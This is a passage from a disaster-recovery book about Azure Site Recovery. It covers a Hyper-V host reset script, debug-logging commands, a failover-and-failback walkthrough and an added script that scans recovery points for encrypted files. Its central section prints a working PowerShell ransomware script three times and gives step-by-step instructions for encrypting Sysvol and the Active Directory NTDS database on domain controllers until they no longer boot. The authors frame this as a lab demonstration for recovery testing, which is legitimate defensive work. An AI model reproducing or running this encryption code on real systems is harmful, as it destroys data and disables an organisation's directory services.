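One way to check the viability of a recovery point inside an isolated Test Failover VM is to scan its data folders for files that are already encrypted. The following PowerShell is an added example, not code from the book: it recognises only the container layout written by the lab Encrypt-File function in this book (two 4-byte lengths, the RSA-wrapped key, the IV, then AES-CBC ciphertext), not real-world ransomware, and the function names, key-size range and sample files are constructed for illustration.

```powershell
# Added example (not from the book). Recognises only the container layout written by
# the lab Encrypt-File function shown in this book:
#   [4-byte key length][4-byte IV length][RSA-wrapped AES key][IV][AES-CBC ciphertext]
function Test-LabEncryptedFile {
    param([Parameter(Mandatory = $true)][string]$Path)

    $stream = [System.IO.File]::OpenRead($Path)
    try {
        $header = New-Object byte[] 8
        if ($stream.Read($header, 0, 8) -ne 8) { return $false }

        $keyLen = [System.BitConverter]::ToInt32($header, 0)
        $ivLen  = [System.BitConverter]::ToInt32($header, 4)

        # AES uses a 128-bit block, so the stored IV is always 16 bytes.
        if ($ivLen -ne 16) { return $false }
        # The wrapped key is as long as the RSA modulus.
        # Assumed range: 1024-bit to 8192-bit certificates.
        if ($keyLen -lt 128 -or $keyLen -gt 1024 -or ($keyLen % 8) -ne 0) { return $false }

        # CBC with padding always leaves at least one whole 16-byte block.
        $bodyLen = $stream.Length - 8 - $keyLen - $ivLen
        return ($bodyLen -ge 16 -and ($bodyLen % 16) -eq 0)
    }
    finally {
        $stream.Dispose()
    }
}

function Get-RecoveryPointVerdict {
    param([Parameter(Mandatory = $true)][string]$Folder)

    $suspect    = New-Object System.Collections.Generic.List[string]
    $unreadable = New-Object System.Collections.Generic.List[string]
    $files = @(Get-ChildItem -Path $Folder -Recurse -File -Force -ErrorAction SilentlyContinue)

    foreach ($file in $files) {
        try {
            if (Test-LabEncryptedFile -Path $file.FullName) { $suspect.Add($file.FullName) }
        }
        catch {
            # Locked or access-denied files cannot be judged either way.
            $unreadable.Add($file.FullName)
        }
    }

    [pscustomobject]@{
        Folder       = $Folder
        FilesScanned = $files.Count
        Suspect      = $suspect.Count
        Unreadable   = $unreadable.Count
        Viable       = ($suspect.Count -eq 0 -and $unreadable.Count -eq 0)
        SuspectFiles = $suspect.ToArray()
    }
}

# Constructed sample data: one plain text file and one file that only mimics the layout
# (random bytes behind a 256/16 header; nothing is actually encrypted).
$demo = Join-Path ([System.IO.Path]::GetTempPath()) ("asr-viability-" + [guid]::NewGuid())
New-Item -ItemType Directory -Path $demo | Out-Null
Set-Content -Path (Join-Path $demo 'notes.txt') -Value 'constructed clean sample'

$body = New-Object byte[] (256 + 16 + 32)
$rng  = [System.Security.Cryptography.RandomNumberGenerator]::Create()
$rng.GetBytes($body)
[byte[]]$mimic = [System.BitConverter]::GetBytes([int]256) +
                 [System.BitConverter]::GetBytes([int]16) + $body
[System.IO.File]::WriteAllBytes((Join-Path $demo 'report.docx'), $mimic)

Get-RecoveryPointVerdict -Folder $demo
Remove-Item -Recurse -Force -Path $demo
```

Run against the constructed folder, the verdict lists report.docx as suspect and marks the folder as not viable; a recovery point taken before the encryption would report no suspect files.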
Reset Settings for your Azure Site Recovery Hyper-V Host
Sometimes it can be difficult to add hosts from Windows Admin Center into Azure Site Recovery. The following script will help take care of error messages like this.
To resolve the issue I had to run a Reset Script on the host to wipe all the settings.
pushd .
try
{
    # The script must run elevated.
    $windowsIdentity=[System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal=new-object System.Security.Principal.WindowsPrincipal($windowsIdentity)
    $administrators=[System.Security.Principal.WindowsBuiltInRole]::Administrator
    $isAdmin=$principal.IsInRole($administrators)
    if (!$isAdmin)
    {
        "Please run the script as an administrator in elevated mode."
        $choice = Read-Host
        return;
    }

    $error.Clear()
    "This script will remove the old Azure Site Recovery Provider related properties. Do you want to continue (Y/N) ?"
    $choice = Read-Host
    if (!($choice -eq 'Y' -or $choice -eq 'y'))
    {
        "Stopping cleanup."
        return;
    }

    # Stop the Azure Site Recovery provider service before touching its settings.
    $serviceName = "dra"
    $service = Get-Service -Name $serviceName
    if ($service.Status -eq "Running")
    {
        "Stopping the Azure Site Recovery service..."
        net stop $serviceName
    }

    $asrHivePath = "HKLM:\SOFTWARE\Microsoft\Azure Site Recovery"
    $registrationPath = $asrHivePath + '\Registration'
    $proxySettingsPath = $asrHivePath + '\ProxySettings'
    $draIdvalue = 'DraID'
    $idMgmtCloudContainerId='IdMgmtCloudContainerId'

    if (Test-Path $asrHivePath)
    {
        if (Test-Path $registrationPath)
        {
            "Removing registration related registry keys."
            Remove-Item -Recurse -Path $registrationPath
        }
        if (Test-Path $proxySettingsPath)
        {
            "Removing proxy settings"
            Remove-Item -Recurse -Path $proxySettingsPath
        }
        $regNode = Get-ItemProperty -Path $asrHivePath
        if($regNode.DraID -ne $null)
        {
            "Removing DraId"
            Remove-ItemProperty -Path $asrHivePath -Name $draIdValue
        }
        if($regNode.IdMgmtCloudContainerId -ne $null)
        {
            "Removing IdMgmtCloudContainerId"
            Remove-ItemProperty -Path $asrHivePath -Name $idMgmtCloudContainerId
        }
        "Registry keys removed."
    }

    # First retrieve all the certificates to be deleted
    $ASRcerts = Get-ChildItem -Path cert:\localmachine\my | where-object {$_.friendlyname.startswith('ASR_SRSAUTH_CERT_KEY_CONTAINER') -or $_.friendlyname.startswith('ASR_HYPER_V_HOST_CERT_KEY_CONTAINER')}
    # Open a cert store object
    $store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
    $store.Open('ReadWrite')
    # Delete the certs
    "Removing all related certificates"
    foreach ($cert in $ASRcerts)
    {
        $store.Remove($cert)
    }
}catch
{
    [system.exception]
    Write-Host "Error occurred" -ForegroundColor "Red"
    $error[0]
    Write-Host "FAILED" -ForegroundColor "Red"
}
popd
Enable Diagnostic Logging for Azure Site Recovery
To enable debug logging for the ASR Provider, use the following steps:
Open an elevated PowerShell window and then run the following commands to create your trace definition:
logman create trace ASRDebug -v mmddhhmm -o C:\temp\asr.etl -cnf 01:00:00 -nb 10 250 -bs 16 -ow -y
logman update ASRDebug -p "Microsoft-Azure Site Recovery-Provider" 0x8000000000000000 0x5
logman update ASRDebug -p "MicrosoftAzureRecoveryServices" 0xC000000000000000 0x5
Note: The default location specified above is C:\temp. You may safely change this value if needed. The folder will be created if it does not exist.
Start the trace by typing the following command in the elevated Windows PowerShell window:
logman start ASRDebug
Reproduce your issue. As soon as you reproduce your issue, stop the trace by typing the following command:
logman stop ASRDebug
To convert the trace to readable text, type:
netsh trace convert
Collect debug logs from the folder \Temp. The default location will be C:\Program Files\Microsoft Azure Recovery Services Agent\Temp.
Zero Day time to Failover
Assuming an Admin Level breach Failing over 100 % to Azure
In this scenario, we are going to look at an attack that takes place directly on your Domain Controllers. This is the worst case for a Ransomware-type attack because the attacker is not looking for an immediate payment; they have hacked into your system and are directly executing the attack.
Note: This scenario is based on real-life events that took place 2 years ago. The client in question had their Admin credentials compromised from an online cloud backup provider. The attackers gained access to the backups and were able to crack the NTDS.dit (Active Directory Database) offline. Then they could come in and out at their leisure. They executed this sophisticated attack on the customer’s busiest day of the year.
To showcase an attack like this, we are going to use PowerShell with Administrative privileges. You will notice how none of Windows Defender’s protection policies catch this. We will do two things in this attack: First, we will encrypt the Sysvol folder on a single domain controller. Second, we will take down Active Directory by encrypting the c:\Windows\NTDS folder on each domain controller.
All of these steps were performed in a lab environment. Please do not try any of these steps in production.
Executing a PowerShell based Ransomware Attack on Domain Controllers.
The code below is to be used only for testing purposes. Do not run this in a production environment. None of the authors of this book take any responsibility for your actions. Windows Defender will not pick this attack up because it was executed with Administrative Credentials. This means that in this case, you are now the victim of a Ransomware Attack.
Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath #global variables $csv = "C:\windows\temp\drives.csv" #Define the cert to use for encryption #Create your own cert with this command; New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local $Cert = $(Get-ChildItem Cert:\LocalMachine\My\60BD2E50C9EB3937CB3DA6FBF2C5ACC925F3C00A) $Cert #discover the other folders beneath the selectedpath $FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) -and ( $_.Name -like "*$fileName*") } | % {$_.FullName} -ErrorAction SilentlyContinue $FilestoEncrypt Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509C ertificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography" ) } Catch { Write-Error "Could not load required assembly."; Return } $AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType()) [Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey) [Int]$LIV = $AesProvider.IV.Length
$LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4) $FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count) $BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force } #Encrypt each file foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue } Exit
Encrypting the Sysvol Folder
Instructions
1. Logon to DC01 as Administrator
2. Open PowerShell ISE and run as Administrator
3. Browse to C:\windows\Sysvol and click ok
Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath
4. Create a new Self Signed Certificate 5. Copy the thumbprint to the clipboard
New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local
6. Run the following to put the Certificate into the $Cert Variable
$Cert = $(Get-ChildItem Cert:\LocalMachine\My\7BD220D0D93475829CD40B4C1A67C2C 89DA4DBCD) $Cert
7. Then Grab the files from the folder
$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} ErrorAction SilentlyContinue $FilestoEncrypt
8. Run the Encrypt-File Function
Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo ]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptogr aphy.X509Certificates.X509Certificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("Sy stem.Security.Cryptography") } Catch { Write-Error "Could not load required assembly."; Return } $AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeForma tter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType()) [Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey)
[Int]$LIV = $AesProvider.IV.Length $LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Nam e)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4) $FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStream Writer, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Writ e) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count) $BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force }
9. Try Encrypting your files
foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue
}
10. Verify that the files are indeed encrypted
11. Test GPUpdate from a client for interesting results. Here is before.
12. Here is after the Sysvol was Encrypted
13. We had a scenario like this at one client and didn’t have a good backup of the Domain Controller. We were able to use DCGPOFix.exe to overwrite the default domain and default domain controller policy to start over.
14. Next, we replicated Active Directory to push our encrypted files out to all domain controllers.
15. Verified on DC02 that the Sysvol was encrypted
Taking Down Production Killing Domain Controllers with Ransomware
In this scenario, we are going to target the Active Directory Database files, which are by default located in c:\Windows\NTDS. We will use the steps performed below to take down all of the Domain Controllers in our lab, leaving us no choice but to restore from backup or failover to a DR site like Azure.
Encrypting the Active Directory Database
Instructions
1. Logon to DC01 as Administrator
2. Open PowerShell ISE and run as Administrator
3. Browse to C:\windows\NTDS and click ok
Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath
4. Create a new Self Signed Certificate 5. Copy the thumbprint to the clipboard
New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local
6. Run the following to put the Certificate into the $Cert Variable
$Cert = $(Get-ChildItem Cert:\LocalMachine\My\7BD220D0D93475829CD40B4C1A67C2C 89DA4DBCD) $Cert
7. Then Grab the files from the folder
$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} ErrorAction SilentlyContinue
$FilestoEncrypt
8. Run the Encrypt-File Function
Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo ]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptogr aphy.X509Certificates.X509Certificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("Sy stem.Security.Cryptography") } Catch { Write-Error "Could not load required assembly."; Return } $AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeForma tter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType()) [Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey) [Int]$LIV = $AesProvider.IV.Length $LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Nam e)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4)
$FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStream Writer, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Writ e) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count) $BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force }
9. Try Encrypting your files
foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue }
10. Let’s see if it worked. Try opening Active Directory users and computers. It appears to be still working.
11. Stop the Active Directory Domain Services Service
12. Try Encrypting the C:\Windows\NTDS folder again
13. Now try to restart the Active Directory Domain Services Service.
14. We can see that the service won’t start, with a weird error: 0xc0000001
15. We can see that Active Directory Users and Computers is not operational
16. Repeat the steps on DC02
17. Both DCs are dead. We should try rebooting, right? Sure, why not.
18. We now have all of our DC’s in a non-bootable state with Blue Screens
19. The attack has succeeded, and all domain controllers are dead.
Survival Mode Recovering to Azure
Remember we talked about a narrow window to recover to Azure. If you outrun your recovery points, all of your data in the cloud will be encrypted as well. What is required at this point, at a minimum, is to plan to proceed and execute quickly with a cloud recovery strategy.
As you can see from the screenshot above, our replication is still running to Azure. Azure Site Recovery doesn’t understand that anything bad has happened. Soon enough all of our DCs in our Recovery Vault will also have rolling blue screens.
Tick Tock time to make a decision – We are Recovering to Azure
Ok, so the decision has been made: we have been asked to proceed with Azure-based recovery. We had created a Recovery Plan in Azure Site Recovery, but Recovery Plans can only be used to Failover to the last Recovery Point. This will not work for us in this situation.
Performing the Double Swing Recovery
The double swing migration method is extremely useful in situations like this. We will first fail the Virtual Machines over to our Azure Tenant, validate that everything is ok, and then bring them back on-prem to save the day.
Instructions
1. Logon to your Azure Tenant and browse to your recovery vault.
2. Click on replicated items
3. Click on DC01 and click Failover
4. After we have validated the Virtual Machines we need to Commit them to Azure
5. Now we will use a Planned Failover to move the Virtual Machines back on-prem.
6. On the planned failover window validate the options and click ok.
7. Repeat the steps on DC02 and wait approximately 45 minutes. In the meantime, we will have a look at a few things.
8. You can see the status of the Planned Failover
9. Viewing the Job status in Hyper-V Manager
10. You can view the progress of the replication by checking cbengine.exe in Resource Monitor.
11. We can also enable debug logging to see what is happening.
logman create trace ASRDebug -v mmddhhmm -o C:\temp\asr.etl -cnf 01:00:00 -nb 10 250 -bs 16 -ow -y
logman update ASRDebug -p "Microsoft-Azure Site Recovery-Provider" 0x8000000000000000 0x5
logman update ASRDebug -p "MicrosoftAzureRecoveryServices" 0xC000000000000000 0x5
logman start ASRDebug
logman stop ASRDebug
netsh trace convert C:\temp\asr_04132122.etl
12. After a while, you can see the planned failover succeeded. We have to hit Complete Failover.
13. Hit Complete Failover
14. You can view the status of the replication in Hyper-V Manager
15. You can see the progress in Azure with the Failback
16. We can see the Domain Controllers back online now.
17. The real test is to see if Active Directory is working now.
18. We can also see that our Sysvol is now fixed.
Chapter 8
Disaster Recovery items left forgotten
Chapter 9
Join us at MVPDays and meet great MVP’s like this in person
If you liked their book, you would love to hear them in person.
Live Presentations
Dave frequently speaks at Microsoft conferences around North America, such as TechEd, VeeamOn, TechDays, and MVPDays Community Roadshow. Cristal runs the MVPDays Community Roadshow. You can find additional information on the following blog:
www.checkyourlogs.net
www.mvpdays.com
Video Training
For video-based training, see the following site:
www.mvpdays.com
Live Instructor-led Classes
Dave has been a Microsoft Certified Trainer (MCT) for more than 15 years and presents scheduled instructor-led classes in the US and Canada. For current dates and locations, see the following sites:
www.truesec.com
www.checkyourlogs.net
Consulting Services
Dave and Cristal have worked with some of the largest companies in the world and have a wealth of experience and expertise. Customer engagements are typically between two weeks and six months.